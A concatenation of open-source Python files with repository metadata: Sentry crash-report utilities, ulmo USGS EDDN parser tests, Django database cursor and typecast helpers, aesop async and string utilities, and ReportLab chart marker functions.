with pytest.raises(AttributeError, match=msg):
stacker.n_features_in_
|
bnaul/scikit-learn
|
sklearn/ensemble/tests/test_stacking.py
|
Python
|
bsd-3-clause
| 19,101
|
from __future__ import absolute_import
import six
import logging
from collections import namedtuple
from symsynd.macho.arch import get_cpu_name
from symsynd.utils import parse_addr
from sentry.interfaces.contexts import DeviceContextType
logger = logging.getLogger(__name__)
APPLE_SDK_MAPPING = {
'iPhone OS': 'iOS',
'tvOS': 'tvOS',
'Mac OS': 'macOS',
'watchOS': 'watchOS',
}
KNOWN_DSYM_TYPES = {
'iOS': 'macho',
'tvOS': 'macho',
'macOS': 'macho',
'watchOS': 'macho',
}
AppInfo = namedtuple('AppInfo', ['id', 'version', 'build', 'name'])
def find_apple_crash_report_referenced_images(binary_images, threads):
"""Given some binary images from an apple crash report and a thread
list this returns a list of image UUIDs to load.
"""
image_map = {}
for image in binary_images:
image_map[image['image_addr']] = image['uuid']
to_load = set()
for thread in threads:
if 'backtrace' not in thread:
continue
for frame in thread['backtrace']['contents']:
img_uuid = image_map.get(frame['object_addr'])
if img_uuid is not None:
to_load.add(img_uuid)
return list(to_load)
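# A minimal usage sketch with made-up crash-report entries (values are
# illustrative only, not taken from a real report):
#
#     binary_images = [{'image_addr': '0x1000', 'uuid': 'abc-123'},
#                      {'image_addr': '0x2000', 'uuid': 'def-456'}]
#     threads = [{'backtrace': {'contents': [{'object_addr': '0x1000'}]}}]
#     find_apple_crash_report_referenced_images(binary_images, threads)
#     # -> ['abc-123']  (only images actually referenced by a frame)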
def find_all_stacktraces(data):
"""Given a data dictionary from an event this returns all
relevant stacktraces in a list. If a frame contains a raw_stacktrace
property it's preferred over the processed one.
"""
rv = []
def _probe_for_stacktrace(container):
raw = container.get('raw_stacktrace')
if raw is not None:
rv.append((raw, container))
else:
processed = container.get('stacktrace')
if processed is not None:
rv.append((processed, container))
exc_container = data.get('sentry.interfaces.Exception')
if exc_container:
for exc in exc_container['values']:
_probe_for_stacktrace(exc)
# The legacy stacktrace interface does not support raw stacktraces
stacktrace = data.get('sentry.interfaces.Stacktrace')
if stacktrace:
rv.append((stacktrace, None))
threads = data.get('threads')
if threads:
for thread in threads['values']:
_probe_for_stacktrace(thread)
return rv
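# A minimal sketch of the expected payload shape (hypothetical event data):
#
#     data = {'sentry.interfaces.Exception': {
#         'values': [{'stacktrace': {'frames': []}}]}}
#     find_all_stacktraces(data)
#     # -> [({'frames': []}, {'stacktrace': {'frames': []}})]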
def get_sdk_from_event(event):
sdk_info = (event.get('debug_meta') or {}).get('sdk_info')
if sdk_info:
return sdk_info
os = (event.get('contexts') or {}).get('os')
if os and os.get('type') == 'os':
return get_sdk_from_os(os)
def get_sdk_from_os(data):
if 'name' not in data or 'version' not in data:
return
dsym_type = KNOWN_DSYM_TYPES.get(data['name'])
if dsym_type is None:
return
try:
system_version = tuple(int(x) for x in (
data['version'] + '.0' * 3).split('.')[:3])
except ValueError:
return
return {
'dsym_type': 'macho',
'sdk_name': data['name'],
'version_major': system_version[0],
'version_minor': system_version[1],
'version_patchlevel': system_version[2],
'build': data.get('build'),
}
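# A quick sketch of the mapping above (illustrative OS context):
#
#     get_sdk_from_os({'name': 'iOS', 'version': '9.3'})
#     # -> {'dsym_type': 'macho', 'sdk_name': 'iOS', 'version_major': 9,
#     #     'version_minor': 3, 'version_patchlevel': 0, 'build': None}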
def get_sdk_from_apple_system_info(info):
if not info:
return None
try:
# Support newer mapping in old format.
if info['system_name'] in KNOWN_DSYM_TYPES:
sdk_name = info['system_name']
else:
sdk_name = APPLE_SDK_MAPPING[info['system_name']]
system_version = tuple(int(x) for x in (
info['system_version'] + '.0' * 3).split('.')[:3])
except (ValueError, LookupError):
return None
return {
'dsym_type': 'macho',
'sdk_name': sdk_name,
'version_major': system_version[0],
'version_minor': system_version[1],
'version_patchlevel': system_version[2],
}
def cpu_name_from_data(data):
"""Returns the CPU name from the given data if it exists."""
device = DeviceContextType.primary_value_for_data(data)
if device:
arch = device.get('arch')
if isinstance(arch, six.string_types):
return arch
# TODO: kill this here. we want to not support that going forward
unique_cpu_name = None
images = (data.get('debug_meta') or {}).get('images') or []
for img in images:
cpu_name = get_cpu_name(img['cpu_type'],
img['cpu_subtype'])
if unique_cpu_name is None:
unique_cpu_name = cpu_name
elif unique_cpu_name != cpu_name:
unique_cpu_name = None
break
return unique_cpu_name
def version_build_from_data(data):
"""Returns release and build string from the given data if it exists."""
app_context = data.get('contexts', {}).get('app', {})
if app_context is not None:
if (app_context.get('app_identifier', None) and
app_context.get('app_version', None) and
app_context.get('app_build', None) and
app_context.get('app_name', None)):
return AppInfo(
app_context.get('app_identifier', None),
app_context.get('app_version', None),
app_context.get('app_build', None),
app_context.get('app_name', None),
)
return None
def rebase_addr(instr_addr, img):
return parse_addr(instr_addr) - parse_addr(img['image_addr'])
def sdk_info_to_sdk_id(sdk_info):
if sdk_info is None:
return None
rv = '%s_%d.%d.%d' % (
sdk_info['sdk_name'],
sdk_info['version_major'],
sdk_info['version_minor'],
sdk_info['version_patchlevel'],
)
build = sdk_info.get('build')
if build is not None:
rv = '%s_%s' % (rv, build)
return rv
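# A quick sketch of the identifier format produced above (illustrative input):
#
#     sdk_info_to_sdk_id({'sdk_name': 'iOS', 'version_major': 9,
#                         'version_minor': 3, 'version_patchlevel': 2,
#                         'build': '13E238'})
#     # -> 'iOS_9.3.2_13E238'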
|
JackDanger/sentry
|
src/sentry/lang/native/utils.py
|
Python
|
bsd-3-clause
| 5,739
|
from datetime import datetime
import pandas as pd
from pandas.util.testing import assert_frame_equal
import ulmo
import ulmo.usgs.eddn.parsers as parsers
import test_util
fmt = '%y%j%H%M%S'
message_test_sets = [
{
'dcp_address': 'C5149430',
'number_of_lines': 4,
'parser': 'twdb_stevens',
'first_row_message_timestamp_utc': datetime.strptime('13305152818', fmt),
},
{
'dcp_address': 'C514D73A',
'number_of_lines': 4,
'parser': 'twdb_sutron',
'first_row_message_timestamp_utc': datetime.strptime('13305072816', fmt),
},
{
'dcp_address': 'C516C1B8',
'number_of_lines': 28,
'parser': 'stevens',
'first_row_message_timestamp_utc': datetime.strptime('13305134352', fmt),
}
]
def test_parse_dcp_message_number_of_lines():
for test_set in message_test_sets:
dcp_data_file = 'usgs/eddn/' + test_set['dcp_address'] + '.txt'
with test_util.mocked_urls(dcp_data_file):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'])
assert len(data) == test_set['number_of_lines']
def test_parse_dcp_message_timestamp():
for test_set in message_test_sets:
dcp_data_file = 'usgs/eddn/' + test_set['dcp_address'] + '.txt'
with test_util.mocked_urls(dcp_data_file):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'])
assert data['message_timestamp_utc'][-1] == test_set['first_row_message_timestamp_utc']
multi_message_test_sets = [
{
'dcp_address': 'C5149430',
'data_files': {
'.*DRS_UNTIL=now.*':'usgs/eddn/C5149430_file1.txt',
'.*DRS_UNTIL=2013%2F294.*':'usgs/eddn/C5149430_file2.txt',
'.*DRS_UNTIL=2013%2F207.*':'usgs/eddn/C5149430_file3.txt'
},
'first_row_message_timestamp_utc': datetime.strptime('14016152818', fmt),
'last_row_message_timestamp_utc': datetime.strptime('13202032818', fmt),
'number_of_lines': 360,
'start': 'P365D'
}
]
def test_multi_message_download():
for test_set in multi_message_test_sets:
with test_util.mocked_urls(test_set['data_files']):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'], start=test_set['start'])
assert data['message_timestamp_utc'][-1] == test_set['first_row_message_timestamp_utc']
assert data['message_timestamp_utc'][0] == test_set['last_row_message_timestamp_utc']
assert len(data) == test_set['number_of_lines']
twdb_stevens_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:11.9 193.76$ 193.70$ 193.62$ 193.54$ 193.49$ 193.43$ 193.37$ 199.62$ 200.51$ 200.98$ 195.00$ 194.33$ ',
'return_value': [
['2013-10-30 04:00:00', pd.np.nan, 193.76],
['2013-10-30 05:00:00', pd.np.nan, 193.70],
['2013-10-30 06:00:00', pd.np.nan, 193.62],
['2013-10-30 07:00:00', pd.np.nan, 193.54],
['2013-10-30 08:00:00', pd.np.nan, 193.49],
['2013-10-30 09:00:00', pd.np.nan, 193.43],
['2013-10-30 10:00:00', pd.np.nan, 193.37],
['2013-10-30 11:00:00', pd.np.nan, 199.62],
['2013-10-30 12:00:00', pd.np.nan, 200.51],
['2013-10-30 13:00:00', pd.np.nan, 200.98],
['2013-10-30 14:00:00', pd.np.nan, 195.00],
['2013-10-30 15:00:00', 11.9, 194.33],
],
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:12.6 Channel:5 Time:28 +304.63 +304.63 +304.63 +304.56 +304.63 +304.63 +304.63 +304.63 +304.63 +304.63 +304.63 +304.71 Channel:6 Time:28 +310.51 +310.66 +310.59 +310.51 +310.51 +310.59 +310.59 +310.51 +310.66 +310.51 +310.66 +310.59 ',
'return_value': [
['2013-10-30 04:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 05:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 06:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 07:00:00', '5', '28', pd.np.nan, 304.56],
['2013-10-30 08:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 09:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 10:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 11:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 12:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 13:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 14:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 15:00:00', '5', '28', 12.6, 304.71],
['2013-10-30 04:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 05:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 06:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 07:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 08:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 09:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 10:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 11:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 12:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 13:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 14:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 15:00:00', '6', '28', 12.6, 310.59],
]
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:12.6 ',
'return_value': pd.DataFrame()
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': """ 79."$}X^pZBF8iB~i>>Xmj[bvr^Zv%JXl,DU=l{uu[ t(
|@2q^sjS!
""",
'return_value': pd.DataFrame()
},
]
def test_parser_twdb_stevens():
for test_set in twdb_stevens_test_sets:
print 'testing twdb_stevens parser'
if isinstance(test_set['return_value'], pd.DataFrame):
parser = getattr(parsers, 'twdb_stevens')
assert_frame_equal(pd.DataFrame(), parser(test_set))
            continue
if len(test_set['return_value'][0]) == 3:
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
else:
columns = ['timestamp_utc', 'channel', 'time', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_stevens')
twdb_sutron_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '":Sense01 60 #60 -67.84 -66.15 -67.73 -67.81 -66.42 -68.45 -68.04 -67.87 -71.53 -73.29 -70.55 -72.71 :BL 13.29',
'return_value': [
['2013-10-30 04:00:00', 'sense01', pd.np.nan, 72.71],
['2013-10-30 05:00:00', 'sense01', pd.np.nan, 70.55],
['2013-10-30 06:00:00', 'sense01', pd.np.nan, 73.29],
['2013-10-30 07:00:00', 'sense01', pd.np.nan, 71.53],
['2013-10-30 08:00:00', 'sense01', pd.np.nan, 67.87],
['2013-10-30 09:00:00', 'sense01', pd.np.nan, 68.04],
['2013-10-30 10:00:00', 'sense01', pd.np.nan, 68.45],
['2013-10-30 11:00:00', 'sense01', pd.np.nan, 66.42],
['2013-10-30 12:00:00', 'sense01', pd.np.nan, 67.81],
['2013-10-30 13:00:00', 'sense01', pd.np.nan, 67.73],
['2013-10-30 14:00:00', 'sense01', pd.np.nan, 66.15],
['2013-10-30 15:00:00', 'sense01', 13.29, 67.84],
],
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '":OTT 703 60 #60 -231.47 -231.45 -231.44 -231.45 -231.47 -231.50 -231.51 -231.55 -231.56 -231.57 -231.55 -231.53 :6910704 60 #60 -261.85 -261.83 -261.81 -261.80 -261.81 -261.83 -261.85 -261.87 -261.89 -261.88 -261.86 -261.83 :BL 13.21',
'return_value': [
['2013-10-30 04:00:00', 'ott 703', pd.np.nan, 231.53],
['2013-10-30 05:00:00', 'ott 703', pd.np.nan, 231.55],
['2013-10-30 06:00:00', 'ott 703', pd.np.nan, 231.57],
['2013-10-30 07:00:00', 'ott 703', pd.np.nan, 231.56],
['2013-10-30 08:00:00', 'ott 703', pd.np.nan, 231.55],
['2013-10-30 09:00:00', 'ott 703', pd.np.nan, 231.51],
['2013-10-30 10:00:00', 'ott 703', pd.np.nan, 231.50],
['2013-10-30 11:00:00', 'ott 703', pd.np.nan, 231.47],
['2013-10-30 12:00:00', 'ott 703', pd.np.nan, 231.45],
['2013-10-30 13:00:00', 'ott 703', pd.np.nan, 231.44],
['2013-10-30 14:00:00', 'ott 703', pd.np.nan, 231.45],
['2013-10-30 15:00:00', 'ott 703', 13.21, 231.47],
['2013-10-30 04:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 05:00:00', '6910704', pd.np.nan, 261.86],
['2013-10-30 06:00:00', '6910704', pd.np.nan, 261.88],
['2013-10-30 07:00:00', '6910704', pd.np.nan, 261.89],
['2013-10-30 08:00:00', '6910704', pd.np.nan, 261.87],
['2013-10-30 09:00:00', '6910704', pd.np.nan, 261.85],
['2013-10-30 10:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 11:00:00', '6910704', pd.np.nan, 261.81],
['2013-10-30 12:00:00', '6910704', pd.np.nan, 261.80],
['2013-10-30 13:00:00', '6910704', pd.np.nan, 261.81],
['2013-10-30 14:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 15:00:00', '6910704', 13.21, 261.85],
]
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"\r\n// \r\n// \r\n// \r\n// \r\n// \r\n-199.88 \r\n-199.92 \r\n-199.96 \r\n-199.98 \r\n-200.05 \r\n-200.09 \r\n-200.15',
'return_value': [
['2013-10-30 04:00:00', pd.np.nan, 200.15],
['2013-10-30 05:00:00', pd.np.nan, 200.09],
['2013-10-30 06:00:00', pd.np.nan, 200.05],
['2013-10-30 07:00:00', pd.np.nan, 199.98],
['2013-10-30 08:00:00', pd.np.nan, 199.96],
['2013-10-30 09:00:00', pd.np.nan, 199.92],
['2013-10-30 10:00:00', pd.np.nan, 199.88],
['2013-10-30 11:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 12:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 13:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 14:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 15:00:00', pd.np.nan, pd.np.nan],
],
},
]
def test_parser_twdb_sutron():
for test_set in twdb_sutron_test_sets:
print 'testing twdb_sutron parser'
if len(test_set['return_value'][0]) == 3:
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
else:
columns = ['timestamp_utc', 'channel', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_sutron')
twdb_texuni_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': ' \r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+340.0,+2013.,+307.0,+1400.,+12.07,+0.000,-109.9,-109.8,-110.1,+30.57,',
'return_value': [
['2013-10-29 16:00:00', pd.np.nan, 109.8],
['2013-10-29 17:00:00', pd.np.nan, 109.8],
['2013-10-29 18:00:00', pd.np.nan, 109.8],
['2013-10-29 19:00:00', pd.np.nan, 109.8],
['2013-10-29 20:00:00', pd.np.nan, 109.8],
['2013-10-29 21:00:00', pd.np.nan, 109.9],
['2013-10-29 22:00:00', pd.np.nan, 109.9],
['2013-10-29 23:00:00', pd.np.nan, 109.9],
['2013-10-30 00:00:00', pd.np.nan, 109.9],
['2013-10-30 01:00:00', pd.np.nan, 109.9],
['2013-10-30 02:00:00', pd.np.nan, 110.0],
['2013-10-30 03:00:00', pd.np.nan, 110.0],
['2013-10-30 04:00:00', pd.np.nan, 109.9],
['2013-10-30 05:00:00', pd.np.nan, 109.9],
['2013-10-30 06:00:00', pd.np.nan, 109.9],
['2013-10-30 07:00:00', pd.np.nan, 109.9],
['2013-10-30 08:00:00', pd.np.nan, 110.0],
['2013-10-30 09:00:00', pd.np.nan, 110.0],
['2013-10-30 10:00:00', pd.np.nan, 110.0],
['2013-10-30 11:00:00', pd.np.nan, 110.1],
['2013-10-30 12:00:00', pd.np.nan, 110.1],
['2013-10-30 13:00:00', pd.np.nan, 110.1],
['2013-10-30 14:00:00', pd.np.nan, 110.1],
['2013-10-30 15:00:00', pd.np.nan, 110.1],
]
},
]
def test_parser_twdb_texuni():
for test_set in twdb_texuni_test_sets:
print 'testing twdb_texuni parser'
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_texuni')
def _assert(test_set, columns, parser):
expected = pd.DataFrame(test_set['return_value'], columns=columns)
expected.index = pd.to_datetime(expected['timestamp_utc'])
del expected['timestamp_utc']
parser = getattr(parsers, parser)
df = parser(test_set)
# to compare pandas dataframes, columns must be in same order
if 'channel' in df.columns:
for channel in pd.np.unique(df['channel']):
df_c = df[df['channel']==channel]
expected_c = expected[expected['channel']==channel]
assert_frame_equal(df_c.sort(axis=1).sort(axis=0), expected_c.sort(axis=1).sort(axis=0))
else:
assert_frame_equal(df.sort(axis=1).sort(axis=0), expected.sort(axis=1).sort(axis=0))
|
nathanhilbert/ulmo
|
test/usgs_eddn_test.py
|
Python
|
bsd-3-clause
| 13,809
|
import datetime
import decimal
import hashlib
import logging
from time import time
from django.conf import settings
from django.utils.encoding import force_bytes
from django.utils.timezone import utc
logger = logging.getLogger('django.db.backends')
class CursorWrapper:
def __init__(self, cursor, db):
self.cursor = cursor
self.db = db
WRAP_ERROR_ATTRS = frozenset(['fetchone', 'fetchmany', 'fetchall', 'nextset'])
def __getattr__(self, attr):
cursor_attr = getattr(self.cursor, attr)
if attr in CursorWrapper.WRAP_ERROR_ATTRS:
return self.db.wrap_database_errors(cursor_attr)
else:
return cursor_attr
def __iter__(self):
with self.db.wrap_database_errors:
for item in self.cursor:
yield item
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Close instead of passing through to avoid backend-specific behavior
# (#17671). Catch errors liberally because errors in cleanup code
# aren't useful.
try:
self.close()
except self.db.Database.Error:
pass
# The following methods cannot be implemented in __getattr__, because the
# code must run when the method is invoked, not just when it is accessed.
def callproc(self, procname, params=None):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
if params is None:
return self.cursor.callproc(procname)
else:
return self.cursor.callproc(procname, params)
def execute(self, sql, params=None):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
if params is None:
return self.cursor.execute(sql)
else:
return self.cursor.execute(sql, params)
def executemany(self, sql, param_list):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
return self.cursor.executemany(sql, param_list)
class CursorDebugWrapper(CursorWrapper):
# XXX callproc isn't instrumented at this time.
def execute(self, sql, params=None):
start = time()
try:
return super(CursorDebugWrapper, self).execute(sql, params)
finally:
stop = time()
duration = stop - start
sql = self.db.ops.last_executed_query(self.cursor, sql, params)
self.db.queries_log.append({
'sql': sql,
'time': "%.3f" % duration,
})
logger.debug(
'(%.3f) %s; args=%s', duration, sql, params,
extra={'duration': duration, 'sql': sql, 'params': params}
)
def executemany(self, sql, param_list):
start = time()
try:
return super(CursorDebugWrapper, self).executemany(sql, param_list)
finally:
stop = time()
duration = stop - start
try:
times = len(param_list)
except TypeError: # param_list could be an iterator
times = '?'
self.db.queries_log.append({
'sql': '%s times: %s' % (times, sql),
'time': "%.3f" % duration,
})
logger.debug(
'(%.3f) %s; args=%s', duration, sql, param_list,
extra={'duration': duration, 'sql': sql, 'params': param_list}
)
###############################################
# Converters from database (string) to Python #
###############################################
def typecast_date(s):
return datetime.date(*map(int, s.split('-'))) if s else None # returns None if s is null
def typecast_time(s): # does NOT store time zone information
if not s:
return None
hour, minutes, seconds = s.split(':')
if '.' in seconds: # check whether seconds have a fractional part
seconds, microseconds = seconds.split('.')
else:
microseconds = '0'
return datetime.time(int(hour), int(minutes), int(seconds), int((microseconds + '000000')[:6]))
def typecast_timestamp(s): # does NOT store time zone information
# "2005-07-29 15:48:00.590358-05"
# "2005-07-29 09:56:00-05"
if not s:
return None
if ' ' not in s:
return typecast_date(s)
d, t = s.split()
# Extract timezone information, if it exists. Currently we just throw
# it away, but in the future we may make use of it.
if '-' in t:
t, tz = t.split('-', 1)
tz = '-' + tz
elif '+' in t:
t, tz = t.split('+', 1)
tz = '+' + tz
else:
tz = ''
dates = d.split('-')
times = t.split(':')
seconds = times[2]
if '.' in seconds: # check whether seconds have a fractional part
seconds, microseconds = seconds.split('.')
else:
microseconds = '0'
tzinfo = utc if settings.USE_TZ else None
return datetime.datetime(
int(dates[0]), int(dates[1]), int(dates[2]),
int(times[0]), int(times[1]), int(seconds),
int((microseconds + '000000')[:6]), tzinfo
)
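# A few illustrative conversions for the typecast helpers above (example
# values; the tzinfo attached by typecast_timestamp depends on settings.USE_TZ):
#
#     typecast_date('2005-07-29')       # -> datetime.date(2005, 7, 29)
#     typecast_time('15:48:00.590358')  # -> datetime.time(15, 48, 0, 590358)
#     typecast_timestamp('2005-07-29 09:56:00-05')
#     # -> datetime.datetime(2005, 7, 29, 9, 56) (the UTC offset is discarded)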
def typecast_decimal(s):
if s is None or s == '':
return None
return decimal.Decimal(s)
###############################################
# Converters from Python to database (string) #
###############################################
def rev_typecast_decimal(d):
if d is None:
return None
return str(d)
def truncate_name(name, length=None, hash_len=4):
"""Shortens a string to a repeatable mangled version with the given length.
"""
if length is None or len(name) <= length:
return name
hsh = hashlib.md5(force_bytes(name)).hexdigest()[:hash_len]
return '%s%s' % (name[:length - hash_len], hsh)
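# A short sketch of the truncation behaviour (hypothetical table name; the
# 4-character suffix is derived from an md5 hash, shown only schematically):
#
#     truncate_name('a_rather_long_table_name', length=10)
#     # -> 'a_rath' + 4 hash characters, i.e. a 10-character name
#     truncate_name('short', length=10)
#     # -> 'short' (returned unchanged)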
def format_number(value, max_digits, decimal_places):
"""
Formats a number into a string with the requisite number of digits and
decimal places.
"""
if value is None:
return None
if isinstance(value, decimal.Decimal):
context = decimal.getcontext().copy()
if max_digits is not None:
context.prec = max_digits
if decimal_places is not None:
value = value.quantize(decimal.Decimal(".1") ** decimal_places, context=context)
else:
context.traps[decimal.Rounded] = 1
value = context.create_decimal(value)
return "{:f}".format(value)
if decimal_places is not None:
return "%.*f" % (decimal_places, value)
return "{:f}".format(value)
def strip_quotes(table_name):
"""
Strip quotes off of quoted table names to make them safe for use in index
names, sequence names, etc. For example '"USER"."TABLE"' (an Oracle naming
scheme) becomes 'USER"."TABLE'.
"""
has_quotes = table_name.startswith('"') and table_name.endswith('"')
return table_name[1:-1] if has_quotes else table_name
|
mattseymour/django
|
django/db/backends/utils.py
|
Python
|
bsd-3-clause
| 7,044
|
import asyncio
import os
from urllib.parse import urlparse
import aiohttp
def damerau_levenshtein(first_string, second_string):
"""Returns the Damerau-Levenshtein edit distance between two strings."""
previous = None
prev_a = None
current = [i for i, x in enumerate(second_string, 1)] + [0]
for a_pos, a in enumerate(first_string):
prev_b = None
previously_previous, previous, current = previous, current, [0] * len(second_string) + [a_pos+1]
for b_pos, b in enumerate(second_string):
cost = int(a != b)
deletion = previous[b_pos] + 1
insertion = current[b_pos-1] + 1
substitution = previous[b_pos-1] + cost
current[b_pos] = min(deletion, insertion, substitution)
if prev_b and prev_a and a == prev_b and b == prev_a and a != b:
current[b_pos] = min(current[b_pos], previously_previous[b_pos-2] + cost)
prev_b = b
prev_a = a
return current[len(second_string) - 1]
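# A few illustrative distances (worked through the algorithm above by hand):
#
#     damerau_levenshtein('abc', 'abc')  # -> 0 (identical strings)
#     damerau_levenshtein('abc', 'abd')  # -> 1 (one substitution)
#     damerau_levenshtein('ab', 'ba')    # -> 1 (one transposition)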
def complete(value):
"""asyncio equivalent to `twisted.internet.defer.succeed`"""
f = asyncio.Future()
f.set_result(value)
return f
roman_numeral_table = [
('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1)
]
def int_to_roman(num):
def parts():
nonlocal num
for letter, value in roman_numeral_table:
while value <= num:
num -= value
yield letter
return ''.join(parts())
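# Illustrative conversions using the table above:
#
#     int_to_roman(4)     # -> 'IV'
#     int_to_roman(1987)  # -> 'MCMLXXXVII'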
class RequestManager:
"""Gross class for managing active requests.
The only thing it really does is make sure that anything using `get()`
won't send out duplicate requests. This is useful when trying to download
metadata for new series.
"""
# FIXME: make this connection map configurable.
connection_map = {
'www.omdbapi.com': 20,
}
current_requests = {}
limits = {}
CONN_POOL = aiohttp.TCPConnector()
count = 0
@classmethod
def get_pool(cls, key):
if key not in cls.limits:
limit = cls.connection_map.get(key, 50)
cls.limits[key] = asyncio.BoundedSemaphore(limit)
return cls.limits[key]
def __init__(self, url, **kwargs):
self.url = url
self.kwargs = kwargs
self.callbacks = []
RequestManager.count += 1
@asyncio.coroutine
def run(self):
key = urlparse(self.url).netloc
p = self.get_pool(key)
with (yield from p):
response = yield from aiohttp.request('GET', self.url, connector=self.CONN_POOL, **self.kwargs)
try:
json = yield from response.json()
except Exception as e:
for cb in self.callbacks:
cb.set_exception(e)
else:
for cb in self.callbacks:
cb.set_result((response, json))
def wait_for(self):
self.callbacks.append(asyncio.Future())
return self.callbacks[-1]
def get(url, **kwargs):
full_url = url + '&'.join(sorted('='.join(kv) for kv in kwargs.get('params', {}).items()))
if full_url in RequestManager.current_requests:
return RequestManager.current_requests[full_url].wait_for()
r = RequestManager(url, **kwargs)
RequestManager.current_requests[full_url] = r
asyncio.async(r.run())
cb = r.wait_for()
@cb.add_done_callback
def callback(result):
del RequestManager.current_requests[full_url]
return r.wait_for()
def setup_logging(name, level):
from logbook import NullHandler, RotatingFileHandler, lookup_level
path = os.path.expanduser('~/.config/aesop/{}.log'.format(name))
level = lookup_level(level)
    # null handler to prevent log records not handled by the
    # RotatingFileHandler from going to stderr
NullHandler().push_application()
RotatingFileHandler(path, level=level).push_application()
def get_language(path):
from aesop import isocodes
for suffix in path.suffixes:
suffix = suffix[1:]
try:
isoname = isocodes.isoname(suffix.title())
except KeyError:
pass
else:
return isoname
if len(suffix) not in {2, 3}:
continue
suffix = suffix.lower()
if len(suffix) == 2:
try:
suffix = isocodes.iso2to3(suffix)
except KeyError:
continue
try:
isocodes.nicename(suffix)
except KeyError:
pass
else:
return suffix
|
nathan-hoad/aesop
|
aesop/utils.py
|
Python
|
bsd-3-clause
| 4,678
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/charts/markers.py
"""
This module defines a collection of markers used in charts.
The make* functions return a simple shape, or a widget in the case of
the smiley.
"""
__version__=''' $Id: markers.py 2385 2004-06-17 15:26:05Z rgbecker $ '''
from reportlab.lib import colors
from reportlab.graphics.shapes import Rect, Line, Circle, Polygon
from reportlab.graphics.widgets.signsandsymbols import SmileyFace
def makeEmptySquare(x, y, size, color):
"Make an empty square marker."
d = size/2.0
rect = Rect(x-d, y-d, 2*d, 2*d)
rect.strokeColor = color
rect.fillColor = None
return rect
def makeFilledSquare(x, y, size, color):
"Make a filled square marker."
d = size/2.0
rect = Rect(x-d, y-d, 2*d, 2*d)
rect.strokeColor = color
rect.fillColor = color
return rect
def makeFilledDiamond(x, y, size, color):
"Make a filled diamond marker."
d = size/2.0
poly = Polygon((x-d,y, x,y+d, x+d,y, x,y-d))
poly.strokeColor = color
poly.fillColor = color
return poly
def makeEmptyCircle(x, y, size, color):
"Make a hollow circle marker."
d = size/2.0
circle = Circle(x, y, d)
circle.strokeColor = color
circle.fillColor = colors.white
return circle
def makeFilledCircle(x, y, size, color):
"Make a hollow circle marker."
d = size/2.0
circle = Circle(x, y, d)
circle.strokeColor = color
circle.fillColor = color
return circle
def makeSmiley(x, y, size, color):
"Make a smiley marker."
d = size
s = SmileyFace()
s.fillColor = color
s.x = x-d
s.y = y-d
s.size = d*2
return s
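# A minimal usage sketch (coordinates, size and colour are illustrative):
#
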